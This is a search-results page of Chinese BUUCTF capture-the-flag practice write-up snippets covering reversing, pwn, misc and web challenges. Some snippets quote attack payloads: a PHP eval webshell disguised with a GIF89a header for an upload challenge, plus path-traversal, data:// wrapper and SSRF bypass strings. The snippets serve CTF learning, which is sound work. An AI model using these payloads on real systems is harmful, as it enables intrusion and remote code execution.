”BUUCTF刷题记录“ 的搜索结果

     个人感觉这个题出的不好,md5根本找不到(是我太菜) 经典无壳,拖进ida,f12找到关键字符串,发现左边地址是红色的,应该是用了花指令,果然 两个一样的指令连在一起,把下面的去掉,按p声明函数,再f5看反编译 ...

     [极客大挑战 2019]Havefun 进入页面 查看页面源代码,在最后发现 <!-- $cat=$_GET['cat']; echo $cat; if($cat=='dog'){ echo 'Syc{cat_cat_cat_cat}'; } --> 传参 cat=dog ...

     vn_pwn_warmup 开了nx和pie 这里给了puts的地址,可以得到libc的基地址 只有这里有个溢出点能溢出0x10个字节 原本的想法是直接用one_gadget来获得shell 但是一直都打不通,由于开了pie也没法本地调试 ...

     [极客大挑战 2019]Upload 进入页面 选择文件上传 此处上传木马 木马内容为 GIF89a <script language="php">eval($_POST['flag']);</script> 做一个phtml的文件

     [ZJCTF 2019]NiZhuanSiWei 进入网址 源码分析 if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")) 用data伪协议传参 ?text=data://text/plain;base64,d2VsY29tZSB0byB0...

     [极客大挑战 2019]Http 进入网址 查看源代码 发现Secret.php 进入 用burpsuite试试 发现It doesn’t come from '... 又发现Please use “Syclover” browser 添加User-Agent:Syclover browser ...再添加

     太巧了,昨天刚看了有关angr的视频今天就碰到有关的题目了 这道题考察两点吧:1.简单的花指令去除 2.在有限域上简化 无壳,ida64打开,发现不能f5,而且也没有main函数,判断应该是用了混淆 从上往下看汇编代码,...

     今天挑战一下,结果最后还是看了别人的wp才写出来的 无壳,ida查看发现不能f5,原因堆栈不平衡 进行栈指针修改 修改出错的地方的栈指针偏移,快捷键alt+k,值改为0 然后就能f5了, ...逻辑也不难,首先输入长度是...

     [GKCTF2020]cve版签到 进入网页 传入 /?url=http://127.0.0.1%00.ctfhub.com 发现 [4] => Tips: Host must be end with ‘123’ 把传入的改为 ?url=http://127.0.0.123%00.ctfhub.com ...得flag

     乌镇峰会种图 jpg文件010editor打开 文件头正常,搜索FF D9文件尾 跳到了最后,顺便发现flag rar ...文件中的秘密 jpg文件010editor打开 文件头正常,搜索FF D9文件尾 跳到了最后,说明没有隐藏文件 ...

     [BJDCTF 2nd]最简单的misc-y1ng ...50 4b 03 04 后的加密为是 08 00 偶数,说明没有加密,是伪加密 修改50 4b 01 02后的加密位后,解压得到未知文件 010editor打开发现IHDR,说明是png格式,发现缺少文件头 ...

     [GKCTF2020]小学生的密码学 仿射密码的代码实现 破解代码 #include <iostream> #include<math.h> #include<string.h> using namespace std; //模的取逆 int dx, y, q;... extend_Eulid(b

     [GKCTF2020]Harley Quinn 下载发现一张图片一个wav wav用Audacity打开 听完发现最后有拨号音 DTMF解得#222833344477773338866# 根据hint九键输出 ctfisfun 下载FreeFileCamouflage 输入图片地址 密钥 然后De-...

     打开是一个html文件,打开看是一个典型的输入验证问题 <!DOCTYPE Html /> <html> <head> <title>...input type="text" name="flag" id="flag" value="Enter the flag" />... &

     关键运算都在main函数 根据提示,我们要输入6次数据,在经过两次处理后的得到的数据,将其转成16进制再变成字符串 第一个处理 这是将输入的六个数据每次取两个,分别给dword_601078和dword_60107c,然后通过sub_...

     [RoarCTF 2019]Easy Java 进入网址 使用burpsuite抓包 点击help 抓包 把GET改为POST 传入filename值为WEB-INF/web.xml 发现com.Wm.ctf.FlagController 然后构造payload: ... base64解码得flag ......

     WarmUp 首先检查源码 看到注释,查看source.php 提示查看hint.php payload file=source.php%253f/../../../../../../ffffllllaaaagggg 即可查看flag ...flag{4207264a-025e-466a-8938-908319885f82} ......

     web [SWPU2019]Web1 [ASIS 2019]Unicorn shop [ACTF2020 新生赛]Include [安洵杯 2019]easy_web [WesternCTF2018]shrine [ACTF2020 新生赛]Exec [GXYCTF2019]禁止套娃 方法一:array_flip()和array_rand() ...

BUUCTF刷题记录(6)

标签:   sql  安全

     文章目录web[FBCTF2019]RCEService web 打ctf(×) 被ctf打(√) [FBCTF2019]RCEService 首先查看文件夹文件,{"cmd":"ls"} 然后输入其他的发现被ban了,看wp得源码 <?...putenv('PATH=/home/rceservice/jail');...

     [BJDCTF2020]Easy MD5 进入网址 输入ffifdyop,抓包 发现(’./levels91.php’) 进入再抓包 发现 然后构造 /levels91.php?a[]=1&b[]=2 抓包 发现(’./levell14.php’) 进入 最后 得flag

     第一次接触花指令,搞了一下午才弄懂 查壳,是upx加壳,脱壳后,拖进ida,发现无法f5 可以看出这应该是关键代码的一部分。 这里jnz跳转到了下一行代码,相当于没跳转 没什么用,而下面的call near ptr 0EC85D78Bh...

BUUCTF刷题记录(2)

标签:   安全  web

     文章目录web[De1CTF 2019]SSRF Me[极客大挑战 2019]PHP web [De1CTF 2019]SSRF Me [极客大挑战 2019]PHP 由于有备份文件,尝试www.zip发现可以下载!!! 得到flag.php文件,但发现Syc{dog_dog_dog_dog}并不是......

     文章目录web[ACTF2020 新生赛]Upload web [ACTF2020 新生赛]Upload 和之前极客大挑战一样的题,上传后缀为phtml即可 连上蚁剑,即可得到flag

     这道题挺迷的,看了别人的wp才知道有这种出题方式 没有加壳,ida打开只有三个函数 main函数也特别简单,就是v4先读取unk_402008这个地址的数据,读28位,经过sub_401160函数的运算 然后给了text,最后输出text ...

     查看源代码发现三个txt进入的格式是这样的 把filename改为/fllllllllllllag emmmmm,点其他连个看看 有思路了重点就是求出这个cookie_secret 作为一个菜鸡,百度tornado ...render是一个类似模板的东西,可以使用...

10  
9  
8  
7  
6  
5  
4  
3  
2  
1